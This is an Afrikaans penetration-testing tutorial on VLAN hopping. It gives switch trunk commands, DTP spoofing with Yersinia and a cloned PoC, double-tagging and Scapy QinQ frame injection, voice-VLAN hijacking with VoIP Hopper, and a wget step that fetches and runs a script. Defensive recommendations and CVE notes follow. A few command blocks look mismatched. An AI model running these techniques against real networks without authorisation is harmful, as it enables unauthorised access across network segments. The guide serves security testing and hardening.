Lateral VLAN Segmentation Bypass

Reading time: 8 minutes

As direkte toegang tot 'n skakel beskikbaar is, kan VLAN-segmentering omseil word. Dit behels die herkonfigurasie van die gekonnekteerde poort na trunk-modus, die vestiging van virtuele interfaces vir teiken VLANs, en die instelling van IP-adresse, hetsy dinamies (DHCP) of staties, afhangende van die scenario (vir verdere besonderhede kyk https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9).

Aanvanklik is identifikasie van die spesifieke gekonnekteerde poort nodig. Dit kan tipies deur CDP-boodskappe gedoen word, of deur die poort te soek via die include masker.

As CDP nie werk nie, kan poortidentifikasie probeer word deur die MAC-adres te soek:

SW1(config)# show mac address-table | include 0050.0000.0500

Voor die oorgang na trunk-modus, moet 'n lys van bestaande VLANs saamgestel word, en hul identifiseerders bepaal. Hierdie identifiseerders word dan aan die koppelvlak toegeken, wat toegang tot verskeie VLANs deur die trunk moontlik maak. Die poort wat gebruik word, is byvoorbeeld geassosieer met VLAN 10.

SW1# show vlan brief

Oorgang na trunk-modus behels die invoer van interface-konfigurasie-modus:

SW1(config)# interface GigabitEthernet 0/2
SW1(config-if)# switchport trunk encapsulation dot1q
SW1(config-if)# switchport mode trunk

Die oorskakeling na trunk-modus sal tydelik konneksie onderbreek, maar dit kan daarna herstel word.

Virtuele interfaces word dan geskep, VLAN-ID's toegeken en geaktiveer:

# Legacy (vconfig) – still works but deprecated in modern kernels
sudo vconfig add eth0 10
sudo vconfig add eth0 20
sudo vconfig add eth0 50
sudo vconfig add eth0 60
sudo ifconfig eth0.10 up
sudo ifconfig eth0.20 up
sudo ifconfig eth0.50 up
sudo ifconfig eth0.60 up

# Modern (ip-link – preferred)
sudo modprobe 8021q
sudo ip link add link eth0 name eth0.10 type vlan id 10
sudo ip link add link eth0 name eth0.20 type vlan id 20
sudo ip link set eth0.10 up
sudo ip link set eth0.20 up
sudo dhclient -v eth0.50
sudo dhclient -v eth0.60

Daarna word 'n adresversoek via DHCP gemaak. Alternatiewelik, in gevalle waar DHCP nie haalbaar is nie, kan adresse handmatig gekonfigureer word:

sudo dhclient -v eth0.10
sudo dhclient -v eth0.20

Voorbeeld van handmatig 'n statiese IP-adres op 'n koppelvlak (VLAN 10) in te stel:

sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0
# or
sudo ip addr add 10.10.10.66/24 dev eth0.10

Verbondenheid word getoets deur ICMP versoeke na die standaard poorte vir VLANs 10, 20, 50, en 60 te begin.

Uiteindelik stel hierdie proses die omseiling van VLAN-segmentasie in staat, wat onbeperkte toegang tot enige VLAN-netwerk fasiliteer, en die grondslag vir daaropvolgende aksies lê.

Ander VLAN-Hopping Tegnieke (geen bevoorregte skakelaar CLI)

Die vorige metode neem aan dat geverifieerde konsole of Telnet/SSH toegang tot die skakelaar verkry word. In werklike betrokkenhede is die aanvaller gewoonlik aan 'n gewone toegangspoort gekoppel. Die volgende Laag-2 truuks laat jou dikwels lateraal beweeg sonder om ooit in die skakelaar OS in te teken:

1. Skakelaar-Spoofing met Dynamiese Trunking Protokol (DTP)

Cisco-skakelaars wat DTP geaktiveer hou, sal gelukkig 'n trunk onderhandel as die peer beweer dat dit 'n skakelaar is. Om 'n enkele DTP “desirable” of “trunk” raam te skep, omskep die toegangspoort in 'n 802.1Q trunk wat alle toegelate VLANs dra.

Yersinia en verskeie PoCs outomatiseer die proses:

# Become a trunk using Yersinia (GUI)
sudo yersinia -G          # Launch GUI → Launch attack → DTP → enabling trunking

# Python PoC (dtp-spoof)
git clone https://github.com/fleetcaptain/dtp-spoof.git
sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable

Recon helper (passief vingerafdruk die poort se DTP-toestand):

sudo modprobe 8021q
sudo ip link add link eth0 name eth0.30 type vlan id 30
sudo ip addr add 10.10.30.66/24 dev eth0.30
sudo ip link set eth0.30 up

# or

wget https://gist.githubusercontent.com/mgeeky/3f678d385984ba0377299a844fb793fa/raw/dtpscan.py
sudo python3 dtpscan.py -i eth0

Sodra die poort na trunk oorgeskakel word, kan jy 802.1Q sub-interfases skep en presies soos in die vorige afdeling getoon, pivot.

2. Dubbel-Tagging (Native-VLAN Misbruik)

As die aanvaller op die native (ongemerkte) VLAN sit, kan 'n vervaardigde raam met twee 802.1Q koppe na 'n tweede VLAN spring, selfs wanneer die poort in toegangmodus vergrendel is. Gereedskap soos VLANPWN DoubleTagging.py (2022-2025 verfrissing) outomatiseer die inspuiting:

python3 DoubleTagging.py \
--interface eth0 \
--nativevlan 1 \
--targetvlan 20 \
--victim 10.10.20.24 \
--attacker 10.10.1.54

3. QinQ (802.1ad) Stapeling

Baie ondernemingskerns ondersteun Q-in-Q diensverskaffer enkapsulasie. Waar toegelaat, kan 'n aanvaller arbitrêre 802.1Q-gemerkte verkeer binne 'n verskaffer (S-tag) tonnel om sekuriteitsgebiede oor te steek. Vang vir ethertype 0x88a8 en probeer om die buite-tag met Scapy te verwyder:

from scapy.all import *
outer = 100      # Service tag
inner = 30       # Customer / target VLAN
payload = Ether(dst="ff:ff:ff:ff:ff:ff")/Dot1Q(vlan=inner)/IP(dst="10.10.30.1")/ICMP()
frame = Dot1Q(type=0x88a8, vlan=outer)/payload
sendp(frame, iface="eth0")

4. Voice-VLAN Hijacking via LLDP/CDP (IP-Phone Spoofing)

Korporatiewe toegangspoorte sit dikwels in 'n “access + voice” konfigurasie: ongetagde data VLAN vir die werkstasie en 'n getagde stem VLAN wat deur CDP of LLDP-MED geadverteer word. Deur 'n IP-telefoon na te boots, kan die aanvaller outomaties die VoIP VLAN ontdek en daarin spring—selfs wanneer DTP gedeaktiveer is.

VoIP Hopper (verpak in Kali 2025.2) ondersteun CDP, DHCP opsies 176/242, en volle LLDP-MED spoofing:

# One-shot discovery & hop
sudo voiphopper -i eth0 -f cisco-7940

# Interactive Assessment Mode (passive sniff → auto-hop when VVID learnt)
sudo voiphopper -i eth0 -z

# Result: new sub-interface eth0.<VVID> with a DHCP or static address inside the voice VLAN

Die tegniek omseil data/spraak skeiding en is uiters algemeen op ondernemingsrand-skakels in 2025 omdat LLDP outomatiese beleid standaard geaktiveer is op baie modelle.

Verdedigende Aanbevelings

1. Deaktiveer DTP op alle gebruikersfrontpoorte: switchport mode access + switchport nonegotiate.
2. Verander die inheemse VLAN op elke trunk na 'n onbenutte, swartgat VLAN en merk dit: vlan dot1q tag native.
3. Prune onnodige VLANs op trunks: switchport trunk allowed vlan 10,20.
4. Handhaaf poortsekuriteit, DHCP snooping, dinamiese ARP-inspeksie en 802.1X om onwettige Laag-2 aktiwiteit te beperk.
5. Deaktiveer LLDP-MED outomatiese spraakbeleide (of sluit dit aan by geverifieerde MAC OUI's) as IP-foon spoofing nie vereis word nie.
6. Verkies private-VLANs of L3 segmentasie eerder as om slegs op 802.1Q skeiding te vertrou.

Werklike Verskaffer Kwetsbaarhede (2022-2024)

Selfs 'n perfek geharde skakelkonfigurasie kan steeds ondermyn word deur firmware foute. Onlangs voorbeelde sluit in:

• CVE-2022-20728† – Cisco Aironet/Catalyst Toegangspunte laat inspuiting van die inheemse VLAN in nie-inheemse WLAN VLANs toe, wat bedrade/draadlose segmentasie omseil.
• CVE-2024-20465 (Cisco IOS Industriële Ethernet) laat ACL omseiling op SVIs toe na die omskakeling van Resilient Ethernet Protocol, wat verkeer tussen VRFs/VLANs lek. Patches 17.9.5 of later.

Monitor altyd die verskaffer advies oor VLAN-verwante omseiling/ACL probleme en hou infrastruktuur beelde op datum.

Verwysings

• https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9
• VLANPWN aanval toolkit – https://github.com/casterbytethrowback/VLANPWN
• Twingate "Wat is VLAN Hopping?" (Aug 2024) – https://www.twingate.com/blog/glossary/vlan%20hopping
• VoIP Hopper projek – https://github.com/hmgh0st/voiphopper
• Cisco Advies “cisco-sa-apvlan-TDTtb4FY” – https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apvlan-TDTtb4FY